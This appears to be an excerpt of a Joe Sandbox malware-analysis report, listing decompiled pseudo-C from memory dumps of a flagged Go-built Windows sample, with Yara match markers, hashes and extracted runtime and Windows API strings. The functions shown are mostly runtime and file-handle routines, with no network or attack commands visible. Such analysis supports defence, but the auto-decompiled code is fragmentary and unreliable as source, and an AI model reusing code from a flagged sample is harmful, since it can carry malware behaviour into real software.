                                                                                                                            • Opcode ID: d13ca485162102a3b12b761681dd095557853d3d567b1ad292b426a3558c3d88
                                                                                                                            • Instruction ID: 74ffed4e07e179765d20628b242163dae9d34320f0e45e4f574698c4a28090dd
                                                                                                                            • Opcode Fuzzy Hash: d13ca485162102a3b12b761681dd095557853d3d567b1ad292b426a3558c3d88
                                                                                                                            • Instruction Fuzzy Hash: 81216A73600D4045FE132B65AC4A7AD6A51E780BB3F294714FA350AAD2C7788842DB3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E0000025B25BF8A816C0(signed int __ebx, signed int __ecx, void* __edx, void* __edi, signed int* __rax, long long __rbx, signed int _a8, long long _a16) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* _t22;
                                                                                                                            				void* _t40;
                                                                                                                            				signed int* _t45;
                                                                                                                            				signed long long _t48;
                                                                                                                            				signed long long _t52;
                                                                                                                            
                                                                                                                            				_a16 = __rbx;
                                                                                                                            				_a8 = __ecx;
                                                                                                                            				r14d = r8d;
                                                                                                                            				r15d = __edx;
                                                                                                                            				if (__edi != 0xfffffffe) goto 0xf8a816fb;
                                                                                                                            				E0000025B25BF8A7B82C(__rax);
                                                                                                                            				 *__rax =  *__rax & 0x00000000;
                                                                                                                            				E0000025B25BF8A7B89C(__rax);
                                                                                                                            				 *__rax = 9;
                                                                                                                            				goto 0xf8a8178a;
                                                                                                                            				if (__ecx < 0) goto 0xf8a81772;
                                                                                                                            				_t40 = __edi -  *0xf8aa7384;
                                                                                                                            				if (_t40 >= 0) goto 0xf8a81772;
                                                                                                                            				_t52 = __ecx >> 5;
                                                                                                                            				_t48 = __ecx * 0x58;
                                                                                                                            				if (_t40 == 0) goto 0xf8a81772;
                                                                                                                            				E0000025B25BF8A83FA8(__ebx & 0x0000001f, __edi, _t48, __ecx, _t52);
                                                                                                                            				_t45 =  *((intOrPtr*)(0xf8aa3200 + _t52 * 8));
                                                                                                                            				if (( *(_t45 + _t48 + 8) & 0x00000001) == 0) goto 0xf8a81751;
                                                                                                                            				r8d = r14d;
                                                                                                                            				E0000025B25BF8A817A0(__ebx & 0x0000001f, __edi, r15d, _t45, _t48, _t52);
                                                                                                                            				goto 0xf8a81767;
                                                                                                                            				E0000025B25BF8A7B89C(_t45);
                                                                                                                            				 *_t45 = 9;
                                                                                                                            				E0000025B25BF8A7B82C(_t45);
                                                                                                                            				 *_t45 =  *_t45 & 0x00000000;
                                                                                                                            				0xf8a84408();
                                                                                                                            				goto 0xf8a8178d;
                                                                                                                            				E0000025B25BF8A7B82C(_t45);
                                                                                                                            				 *_t45 =  *_t45 & 0x00000000;
                                                                                                                            				_t22 = E0000025B25BF8A7B89C(_t45);
                                                                                                                            				 *_t45 = 9;
                                                                                                                            				return E0000025B25BF8A7BEC4(_t22) | 0xffffffff;
                                                                                                                            			}











                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 310312816-0
                                                                                                                            • Opcode ID: c77d8221c3d2fa32162d4f967970c43185e40598afa946d756d5ee2bd82690bf
                                                                                                                            • Instruction ID: 4cd3c4036b49f216570b8943c214ec2c8630ae4996ce0f15f8c67aa6b688dbd4
                                                                                                                            • Opcode Fuzzy Hash: c77d8221c3d2fa32162d4f967970c43185e40598afa946d756d5ee2bd82690bf
                                                                                                                            • Instruction Fuzzy Hash: 86218E7361094046FF132F25ED493AD6A91E7807B3F694518FA2507AD2CB788842CB7C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E01309FA0(signed char __ecx, signed long long __rax, long long __rbp, void* __r14) {
                                                                                                                            				char _v8;
                                                                                                                            				void* _v16;
                                                                                                                            				void* _t58;
                                                                                                                            				signed char _t76;
                                                                                                                            				void* _t77;
                                                                                                                            				void* _t79;
                                                                                                                            				void* _t80;
                                                                                                                            				signed long long _t92;
                                                                                                                            				intOrPtr _t96;
                                                                                                                            				intOrPtr _t101;
                                                                                                                            				intOrPtr _t106;
                                                                                                                            				intOrPtr _t110;
                                                                                                                            				long long _t113;
                                                                                                                            				signed long long _t118;
                                                                                                                            				signed long long _t119;
                                                                                                                            				signed long long _t121;
                                                                                                                            				long long _t122;
                                                                                                                            				void* _t128;
                                                                                                                            				void* _t132;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t132 = __r14;
                                                                                                                            					_t126 = __rbp;
                                                                                                                            					_t92 = __rax;
                                                                                                                            					_t76 = __ecx;
                                                                                                                            					if(_t128 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L26;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t126 =  &_v8;
                                                                                                                            					if( *0x1468364 != 0x10) {
                                                                                                                            						L25:
                                                                                                                            						E01330BA0(0x1388b53, _t115, _t126);
                                                                                                                            						goto L26;
                                                                                                                            					}
                                                                                                                            					L2:
                                                                                                                            					L4:
                                                                                                                            					while(_t92 < 0x44) {
                                                                                                                            						_t78 =  *(0x1468360 + _t92 * 2) & 0x0000ffff;
                                                                                                                            						 *(0x14d20d0 + (_t92 + _t92 * 2) * 8) =  *(0x1468360 + _t92 * 2) & 0x0000ffff;
                                                                                                                            						_t92 = _t92 + 1;
                                                                                                                            						__eflags = _t92;
                                                                                                                            					}
                                                                                                                            					_t123 =  *0x14cf478; // 0x1000
                                                                                                                            					if(_t123 == 0) {
                                                                                                                            						L24:
                                                                                                                            						E01330BA0(0x138c0c4, _t115, _t126);
                                                                                                                            						goto L25;
                                                                                                                            					}
                                                                                                                            					L6:
                                                                                                                            					if(_t123 > 0x80000) {
                                                                                                                            						L23:
                                                                                                                            						E01332340(_t123, _t126, _t132);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x138906a, _t115, _t126, _t132);
                                                                                                                            						_t96 =  *0x14cf478; // 0x1000
                                                                                                                            						E01332940(_t78, _t79, _t80, _t96, _t118, _t126, _t132);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x138cfaf, _t115, _t126, _t132);
                                                                                                                            						E01332A40(_t76, _t77, _t78, _t79, _t80, 0x138cfaf, 0x1468360, _t126, _t132);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x13867b1, _t115, _t126, _t132);
                                                                                                                            						L013323C0(_t123, _t126, _t132);
                                                                                                                            						E01330BA0(0x1389824, _t115, _t126);
                                                                                                                            						goto L24;
                                                                                                                            					}
                                                                                                                            					L7:
                                                                                                                            					if(_t123 < 0x1000) {
                                                                                                                            						L22:
                                                                                                                            						E01332340(_t123, _t126, _t132);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x138906a, _t115, _t126, _t132);
                                                                                                                            						_t101 =  *0x14cf478; // 0x1000
                                                                                                                            						E01332940(_t78, _t79, _t80, _t101, _t118, _t126, _t132);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x138d1ef, _t115, _t126, _t132);
                                                                                                                            						E01332A40(_t76, _t77, _t78, _t79, _t80, 0x138d1ef, 0x1468360, _t126, _t132);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x13867b1, _t115, _t126, _t132);
                                                                                                                            						L013323C0(_t123, _t126, _t132);
                                                                                                                            						E01330BA0(0x1389824, _t115, _t126);
                                                                                                                            						goto L23;
                                                                                                                            					}
                                                                                                                            					L8:
                                                                                                                            					_t10 = _t123 - 1; // 0xfff
                                                                                                                            					_t115 = _t10;
                                                                                                                            					if((_t123 & _t10) != 0) {
                                                                                                                            						L21:
                                                                                                                            						E01332340(_t123, _t126, _t132);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x138906a, _t115, _t126, _t132);
                                                                                                                            						_t106 =  *0x14cf478; // 0x1000
                                                                                                                            						E01332940(_t78, _t79, _t80, _t106, _t118, _t126, _t132);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x138a37c, _t115, _t126, _t132);
                                                                                                                            						L013323C0(_t123, _t126, _t132);
                                                                                                                            						E01330BA0(0x1389824, _t115, _t126);
                                                                                                                            						goto L22;
                                                                                                                            					}
                                                                                                                            					L9:
                                                                                                                            					_t123 =  *0x14cf470; // 0x0
                                                                                                                            					_t13 = _t123 - 1; // -1
                                                                                                                            					_t115 = _t13;
                                                                                                                            					if((_t123 & _t115) != 0) {
                                                                                                                            						L20:
                                                                                                                            						E01332340(_t123, _t126, _t132);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x138a8b2, _t115, _t126, _t132);
                                                                                                                            						_t110 =  *0x14cf470; // 0x0
                                                                                                                            						E01332940(_t78, _t79, _t80, _t110, _t118, _t126, _t132);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x138a37c, _t115, _t126, _t132);
                                                                                                                            						L013323C0(_t123, _t126, _t132);
                                                                                                                            						E01330BA0(0x138ae97, _t115, _t126);
                                                                                                                            						goto L21;
                                                                                                                            					}
                                                                                                                            					L10:
                                                                                                                            					if(_t123 > 0x400000) {
                                                                                                                            						 *0x14cf470 = 0;
                                                                                                                            					}
                                                                                                                            					if( *0x14cf470 != 0) {
                                                                                                                            						while(1) {
                                                                                                                            							L18:
                                                                                                                            							_t118 =  *0x14cf468; // 0x0
                                                                                                                            							__eflags = _t118 - 0x40;
                                                                                                                            							asm("dec eax");
                                                                                                                            							_t115 = _t115 << _t76 & _t123;
                                                                                                                            							__eflags =  *0x14cf470 - _t115; // 0x0
                                                                                                                            							if(__eflags == 0) {
                                                                                                                            								break;
                                                                                                                            							}
                                                                                                                            							L17:
                                                                                                                            							_t21 = _t118 + 1; // 0x1
                                                                                                                            							_t123 = _t21;
                                                                                                                            							 *0x14cf468 = _t123;
                                                                                                                            						}
                                                                                                                            						L19:
                                                                                                                            					}
                                                                                                                            					L13:
                                                                                                                            					_t113 = 0x14915c0;
                                                                                                                            					E01321580(0, 0x14915c0, _t115, _t126, 0x14d20d0, _t132);
                                                                                                                            					E01311D00(1, _t78, _t118, _t126, _t132);
                                                                                                                            					 *0x14cf430 = 0x14915c0;
                                                                                                                            					_t58 = 0x7f;
                                                                                                                            					L15:
                                                                                                                            					while(_t113 >= 0) {
                                                                                                                            						_v16 = _t113;
                                                                                                                            						_t58 = E013147A0(1, _t76, _t77, _t78, _t79, 0x14a8168, _t123, _t126, _t132);
                                                                                                                            						_t119 = _v16;
                                                                                                                            						_t123 = _t119;
                                                                                                                            						_t121 = _t119 << 0x00000028 | 0x00000000;
                                                                                                                            						__eflags = _t121;
                                                                                                                            						 *0x14a8168 = _t121;
                                                                                                                            						_t122 =  *0x14a1970; // 0x25bf3784cd0
                                                                                                                            						 *0x014A8178 = _t122;
                                                                                                                            						 *0x14a1970 = 0x14a8168;
                                                                                                                            						_t113 = _t119 - 1;
                                                                                                                            					}
                                                                                                                            					return _t58;
                                                                                                                            					L27:
                                                                                                                            					L26:
                                                                                                                            					E01356200(_t123, _t126);
                                                                                                                            				}
                                                                                                                            			}






















                                                                                                                            0x0130a207
                                                                                                                            0x00000000
                                                                                                                            0x0130a207
                                                                                                                            0x0130a01a
                                                                                                                            0x0130a01a
                                                                                                                            0x0130a01a
                                                                                                                            0x0130a023
                                                                                                                            0x0130a14e
                                                                                                                            0x0130a14e
                                                                                                                            0x0130a160
                                                                                                                            0x0130a165
                                                                                                                            0x0130a16c
                                                                                                                            0x0130a180
                                                                                                                            0x0130a185
                                                                                                                            0x0130a196
                                                                                                                            0x00000000
                                                                                                                            0x0130a196
                                                                                                                            0x0130a029
                                                                                                                            0x0130a029
                                                                                                                            0x0130a030
                                                                                                                            0x0130a030
                                                                                                                            0x0130a037
                                                                                                                            0x0130a105
                                                                                                                            0x0130a105
                                                                                                                            0x0130a116
                                                                                                                            0x0130a11b
                                                                                                                            0x0130a122
                                                                                                                            0x0130a133
                                                                                                                            0x0130a138
                                                                                                                            0x0130a149
                                                                                                                            0x00000000
                                                                                                                            0x0130a149
                                                                                                                            0x0130a040
                                                                                                                            0x0130a047
                                                                                                                            0x0130a049
                                                                                                                            0x0130a049
                                                                                                                            0x0130a05c
                                                                                                                            0x0130a0da
                                                                                                                            0x0130a0da
                                                                                                                            0x0130a0da
                                                                                                                            0x0130a0e1
                                                                                                                            0x0130a0e5
                                                                                                                            0x0130a0f0
                                                                                                                            0x0130a0f3
                                                                                                                            0x0130a0fa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130a0cf
                                                                                                                            0x0130a0cf
                                                                                                                            0x0130a0cf
                                                                                                                            0x0130a0d3
                                                                                                                            0x0130a0d3
                                                                                                                            0x0130a100
                                                                                                                            0x0130a100
                                                                                                                            0x0130a05e
                                                                                                                            0x0130a05e
                                                                                                                            0x0130a065
                                                                                                                            0x0130a06a
                                                                                                                            0x0130a06f
                                                                                                                            0x0130a076
                                                                                                                            0x00000000
                                                                                                                            0x0130a0c0
                                                                                                                            0x0130a07d
                                                                                                                            0x0130a089
                                                                                                                            0x0130a08e
                                                                                                                            0x0130a093
                                                                                                                            0x0130a0a4
                                                                                                                            0x0130a0a4
                                                                                                                            0x0130a0a7
                                                                                                                            0x0130a0aa
                                                                                                                            0x0130a0b1
                                                                                                                            0x0130a0b5
                                                                                                                            0x0130a0bc
                                                                                                                            0x0130a0bc
                                                                                                                            0x0130a0ce
                                                                                                                            0x00000000
                                                                                                                            0x0130a2a0
                                                                                                                            0x0130a2a0
                                                                                                                            0x0130a2a0

                                                                                                                            Strings
                                                                                                                            • failed to get system page sizefreedefer with d._panic != nilinappropriate ioctl for deviceinvalid pointer found on stacknotetsleep - waitm out of syncprotocol wrong type for socketrunqputslow: queue is not fullruntime: bad g in cgocallbackruntime: bad pointer, xrefs: 0130A27B
                                                                                                                            • bad system huge page sizechansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressoperation now in progressreleasep: , xrefs: 0130A13D
                                                                                                                            • system huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape Verde Standard TimeCertFreeCertificateChainCreateToolhelp32SnapshotGetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard Ti, xrefs: 0130A10A
                                                                                                                            • bad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pfloating point errorforcegc: phase errorgo of nil func valuegopark: bad g statusinconsistent lockedminvalid request code, xrefs: 0130A18A, 0130A1FB, 0130A26A
                                                                                                                            • bad TinySizeClassdebugPtrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overflowno data availablenotetsleepg on g0permission deniedreflect: call of runtime.newosprocruntime/internal/runti, xrefs: 0130A28C
                                                                                                                            • system page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseConte, xrefs: 0130A153, 0130A1A5, 0130A211
                                                                                                                            • ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 0130A1E5, 0130A24F
                                                                                                                            • ) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeGreenland Standard TimeGreenwi, xrefs: 0130A127, 0130A171
                                                                                                                            • ) is smaller than minimum page size (_cgo_notify_runtime_init_done missingall goroutines are asleep - deadlock!cannot exec a shared library directlycipher: message authentication failedcrypto/cipher: invalid buffer overlapfailed to reserve page summary memoryi, xrefs: 0130A1C5
                                                                                                                            • ) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyzGo pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuery failed; errno=runtime:, xrefs: 0130A231
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-4108490159
                                                                                                                            • Opcode ID: 20a4c6e40e68071e8d9d2fa80effe129e55b1d0a52d505d531c0d9fe14491a4b
                                                                                                                            • Instruction ID: 47658648e8793a639eb0a1c3dc324a2a5b6a8325407a405882da7623ebbf6b72
                                                                                                                            • Opcode Fuzzy Hash: 20a4c6e40e68071e8d9d2fa80effe129e55b1d0a52d505d531c0d9fe14491a4b
                                                                                                                            • Instruction Fuzzy Hash: 4F616971311B4685EB09EB68E8903DA77A9EBA878CF844432DA4D07371DF3CC589C365
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$BoundaryDeleteDescriptor_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3555341564-0
                                                                                                                            • Opcode ID: 50c98f4714fd4594761e6b4e8a20afdbdebcaf9c69dafa40b21d10a3d1af1587
                                                                                                                            • Instruction ID: c3c7281202f1e7a664a4ea00e2fd88a15d4c20186956cacb2caba9b1425fde66
                                                                                                                            • Opcode Fuzzy Hash: 50c98f4714fd4594761e6b4e8a20afdbdebcaf9c69dafa40b21d10a3d1af1587
                                                                                                                            • Instruction Fuzzy Hash: 65417E36255E0A4FFFA5EB58EC997B436D1F719322F684068F109C25A1DF3CE8828725
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 81%
                                                                                                                            			E0130F325(long long _a8, long long _a24) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				long long _v32;
                                                                                                                            				char _v33;
                                                                                                                            				char _t29;
                                                                                                                            				void* _t75;
                                                                                                                            				void* _t77;
                                                                                                                            				void* _t78;
                                                                                                                            				void* _t79;
                                                                                                                            				void* _t80;
                                                                                                                            				long long _t85;
                                                                                                                            				intOrPtr _t88;
                                                                                                                            				intOrPtr _t98;
                                                                                                                            				long long _t106;
                                                                                                                            				void* _t109;
                                                                                                                            				long long _t110;
                                                                                                                            				long long _t112;
                                                                                                                            				void* _t116;
                                                                                                                            
                                                                                                                            				_t76 = _t29;
                                                                                                                            				 *_t85 =  *_t85 + _t75;
                                                                                                                            				 *((intOrPtr*)(_t85 - 0x7d)) =  *((intOrPtr*)(_t85 - 0x7d)) + _t29;
                                                                                                                            				_v8 = _t112;
                                                                                                                            				_t113 =  &_v8;
                                                                                                                            				_a8 = _t85;
                                                                                                                            				_a24 = _t107;
                                                                                                                            				_v16 = _t106;
                                                                                                                            				_v24 = _t110;
                                                                                                                            				E01332340(_t109,  &_v8, _t116);
                                                                                                                            				E01332340(_t109,  &_v8, _t116);
                                                                                                                            				E01332C40(_t76, _t78, _t79, _t80, 0x1388c74, _t106,  &_v8, _t116);
                                                                                                                            				L01332AA0(_t77, _t78, _t80, _v16, _t107, _t113, _t116);
                                                                                                                            				L013323C0(_t109, _t113, _t116);
                                                                                                                            				_t88 = _a8;
                                                                                                                            				if(_t88 == 0) {
                                                                                                                            					L5:
                                                                                                                            					E01332340(_t109, _t113, _t116);
                                                                                                                            					E013325A0(_t76, _t77, _t78, _t79, _t80, _t113, _t116);
                                                                                                                            					L013323C0(_t109, _t113, _t116);
                                                                                                                            					if(_a24 != 0) {
                                                                                                                            						L7:
                                                                                                                            						E01332340(_t109, _t113, _t116);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x138c1d2, _t106, _t113, _t116);
                                                                                                                            						L01332AA0(_t77, _t78, _t80, _a24, _t107, _t113, _t116);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80,  &M0138678B, _t106, _t113, _t116);
                                                                                                                            						L01332AA0(_t77, _t78, _t80, _v24, _t107, _t113, _t116);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x13867b1, _t106, _t113, _t116);
                                                                                                                            						L013323C0(_t109, _t113, _t116);
                                                                                                                            						L0131AD60(_t79, 0x1386cf5, _t106, _a24, _v24, _t113, _t116);
                                                                                                                            					}
                                                                                                                            					_t107 =  *((intOrPtr*)(_t116 + 0x30));
                                                                                                                            					 *((char*)( *((intOrPtr*)(_t116 + 0x30)) + 0xf9)) = 2;
                                                                                                                            					E01330BA0(0x138eed5, _t106, _t113);
                                                                                                                            					goto L7;
                                                                                                                            				} else {
                                                                                                                            					_t76 =  *((intOrPtr*)(_t88 + 0x63));
                                                                                                                            					_v33 = _t76;
                                                                                                                            					if(_t76 == 1) {
                                                                                                                            						E01332340(_t109, _t113, _t116);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x138ac71, _t106, _t113, _t116);
                                                                                                                            						L013323C0(_t109, _t113, _t116);
                                                                                                                            					} else {
                                                                                                                            						E01332340(_t109, _t113, _t116);
                                                                                                                            						E01332C40(_t76, _t78, _t79, _t80, 0x1389644, _t106, _t113, _t116);
                                                                                                                            						L013323C0(_t109, _t113, _t116);
                                                                                                                            					}
                                                                                                                            					_t98 = _a8;
                                                                                                                            					_t107 =  *((intOrPtr*)(_t98 + 0x70));
                                                                                                                            					_v16 =  *((intOrPtr*)(_t98 + 0x70));
                                                                                                                            					_v32 =  *((intOrPtr*)(_t98 + 0x18));
                                                                                                                            					E01332340(_t109, _t113, _t116);
                                                                                                                            					E01332C40(_t76, _t78, _t79, _t80, 0x1387e46, _t106, _t113, _t116);
                                                                                                                            					L01332AA0(_t77, _t78, _t80, _v32,  *((intOrPtr*)(_t98 + 0x70)), _t113, _t116);
                                                                                                                            					E01332C40(_t76, _t78, _t79, _t80, 0x1387ac4, _t106, _t113, _t116);
                                                                                                                            					L01332AA0(_t77, _t78, _t80, _v16,  *((intOrPtr*)(_t98 + 0x70)), _t113, _t116);
                                                                                                                            					E01332C40(_t76, _t78, _t79, _t80, 0x1387ad0, _t106, _t113, _t116);
                                                                                                                            					E01332940(_t78, _t79, _t80, 0x1387ad0, _t107, _t113, _t116);
                                                                                                                            					L013323C0(_t109, _t113, _t116);
                                                                                                                            					goto L5;
                                                                                                                            				}
                                                                                                                            			}























                                                                                                                            Strings
                                                                                                                            • +,-./0:<=?CLMPSZ[\, xrefs: 0130F490
                                                                                                                            • to unused region of spanAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironmentStringsWGODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusKaliningrad Standard TimeMiddle East Standard TimeNew Zealan, xrefs: 0130F4EF
                                                                                                                            • span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_GondiMapViewOfFileMasaram_GondiMende_KikakuiOld_HungarianRegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExW, xrefs: 0130F3D1
                                                                                                                            • to unallocated spanArabic Standard TimeAzores Standard TimeCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWEgyptian_HieroglyphsGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetProcessMemoryInfoIDS_Trinary_Operator, xrefs: 0130F39F
                                                                                                                            • runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt t, xrefs: 0130F356
                                                                                                                            • runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutex) not in usable address space: ...additional frames elided....lib section in a.out corruptedCentral Brazilian, xrefs: 0130F475
                                                                                                                            • ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 0130F4AF
                                                                                                                            • found bad pointer in Go heap (incorrect use of unsafe or cgo?)runtime: internal error: misuse of lockOSThread/unlockOSThreadABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_compileC, xrefs: 0130F45F
                                                                                                                            • span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetStdHandleGetTempPathWJoin_ControlLoadLibraryWMeetei_MayekPahawh_HmongReadConsoleWRevertToSelfSetEndOf, xrefs: 0130F3EF
                                                                                                                            • objectpopcntrdtscpselectsocketstringstructsweep sysmontimersuint16uint32uint64 (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaic, xrefs: 0130F4CA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-844679649
                                                                                                                            • Opcode ID: 099ff3dcdf718d9e8b42492bf9f476a288a11f1f92c499c3249f758845e325aa
                                                                                                                            • Instruction ID: 81bb997cccdc6cd3b2b1ddc9bb1bce31473f47804755d7a0141055ed7f6f97bb
                                                                                                                            • Opcode Fuzzy Hash: 099ff3dcdf718d9e8b42492bf9f476a288a11f1f92c499c3249f758845e325aa
                                                                                                                            • Instruction Fuzzy Hash: 51417B32215B82C6DB15BB68E48039FBBA8FBE8758F841061EE8E03774DF28C544C725
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2288870239-0
                                                                                                                            • Opcode ID: 50c98f4714fd4594761e6b4e8a20afdbdebcaf9c69dafa40b21d10a3d1af1587
                                                                                                                            • Instruction ID: 0cf2cd695b350dc328095373b71d621a2940d46470cc00f6be4e23795585c509
                                                                                                                            • Opcode Fuzzy Hash: 50c98f4714fd4594761e6b4e8a20afdbdebcaf9c69dafa40b21d10a3d1af1587
                                                                                                                            • Instruction Fuzzy Hash: DA31DD23211E0681FE579B15EC5D3BC63A0EB587B2F3C0116F91906EA9DF7D8465A338
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 71%
                                                                                                                            			E0000025B25BF8A80064(signed int __ebx, signed int __ecx, void* __edx, void* __edi, signed int* __rax, long long __rbx, void* __rdx, signed int _a8, long long _a16) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* __rsi;
                                                                                                                            				void* _t22;
                                                                                                                            				void* _t35;
                                                                                                                            				void* _t37;
                                                                                                                            				void* _t40;
                                                                                                                            				signed int* _t45;
                                                                                                                            				signed long long _t48;
                                                                                                                            				signed long long _t54;
                                                                                                                            				void* _t58;
                                                                                                                            				void* _t59;
                                                                                                                            
                                                                                                                            				_t35 = __edx;
                                                                                                                            				_a16 = __rbx;
                                                                                                                            				_a8 = __ecx;
                                                                                                                            				r14d = r8d;
                                                                                                                            				if (__edi != 0xfffffffe) goto 0xf8a8009f;
                                                                                                                            				E0000025B25BF8A7B82C(__rax);
